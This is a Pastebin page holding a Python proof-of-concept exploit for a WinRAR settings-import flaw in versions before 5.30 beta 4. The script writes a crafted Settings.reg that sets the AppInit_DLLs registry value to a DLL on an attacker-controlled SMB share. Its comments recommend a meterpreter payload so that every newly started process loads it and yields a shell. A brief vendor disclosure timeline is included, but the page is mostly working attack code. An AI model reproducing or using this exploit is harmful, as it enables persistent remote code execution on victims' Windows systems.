API tools faq
paste
Advertisement
moften

WinRar Settings Import Command Execution

moften
Oct 6th, 2015
223
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.46 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python -w
  2.  
  3. # Title : WinRar Settings Import Command Execution
  4.  
  5. # Date : 02/10/2015
  6.  
  7. # Author : R-73eN
  8.  
  9. # Tested on : Windows 7 Ultimate
  10.  
  11. # Vulnerable Versions : Winrar < 5.30 beta 4
  12.  
  13. # The vulnerability exists in the "Import Settings From File" function.
  14.  
  15. # Since Settings file of Winrar are saved as a registry file and WinRar
  16. executes
  17.  
  18. # it in an automatic way without checking if it is writing to the Registry
  19. keys
  20.  
  21. # used by winrar, we can create a specially crafted settings file and we
  22. can
  23.  
  24. # overwrite registry keys.
  25.  
  26. # Since we have access to registry there are various ways we could use this
  27. to
  28.  
  29. # get code execution such as defining "RUN" keys or creating new services
  30. etc
  31.  
  32. # However the best way to get code execution is using AppInit DLLs
  33.  
  34. # AppInit DLLs are DLLs that are loaded into any process when it starts.
  35.  
  36. # In this case, we can specify a meterpreter DLL payload using a UNC path on
  37.  
  38. # an SMB server we control and then next time a new process starts we will
  39.  
  40. # get a shell.
  41.  
  42. # Read more about AppInit Dlls :
  43. https://support.microsoft.com/en-us/kb/197571
  44.  
  45. #
  46.  
  47. # Triggering the vulnerability
  48.  
  49. # 1) Run this python script.
  50.  
  51. # 2) Open WinRar
  52.  
  53. # 3) Click Options
  54.  
  55. # 4) Click Import/Export
  56.  
  57. # 5) Import Settings from file
  58.  
  59. # 6) Select the Specially crafted Settings.reg file
  60.  
  61. #
  62.  
  63. # Disclosure Timeline:
  64.  
  65. # 01/10/2015 - Vendor Contacted POC provided
  66.  
  67. # 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 on to verify
  68.  
  69. # presence of [HKEY_CURRENT_USER\Software\WinRAR] or
  70.  
  71. # [HKEY_CURRENT_USER\Software\WinRAR\
  72.  
  73. #
  74.  
  75. #
  76.  
  77.  
  78. banner = ""
  79.  
  80. banner +=" ___ __ ____ _ _ \n"
  81.  
  82. banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
  83.  
  84. banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
  85.  
  86. banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
  87.  
  88. banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
  89.  
  90. print banner
  91.  
  92. print "[+] WinRar Settings Import Command Execution [+]\n"
  93.  
  94. dll = raw_input("[+] Enter dll location (smb) : ")
  95.  
  96. dll = dll.replace("\\","\\\\")
  97.  
  98. print "[+] Writing Contet To Settings.reg [+]"
  99.  
  100. evil = 'Windows Registry Editor Version
  101. 5.00\n\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
  102. NT\CurrentVersion\Windows]\n"AppInit_DLLs"="' + dll +
  103. '"\n"LoadAppInit_DLLs"=dword:00000001\n'
  104.  
  105. print evil
  106.  
  107. f = open("Settings.reg","w")
  108.  
  109. f.write(evil)
  110.  
  111. f.close()
  112.  
  113. print "[+] Settings.reg created successfully [+]"
  114.  
  115. print "\n https://www.infogen.al/ \n"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!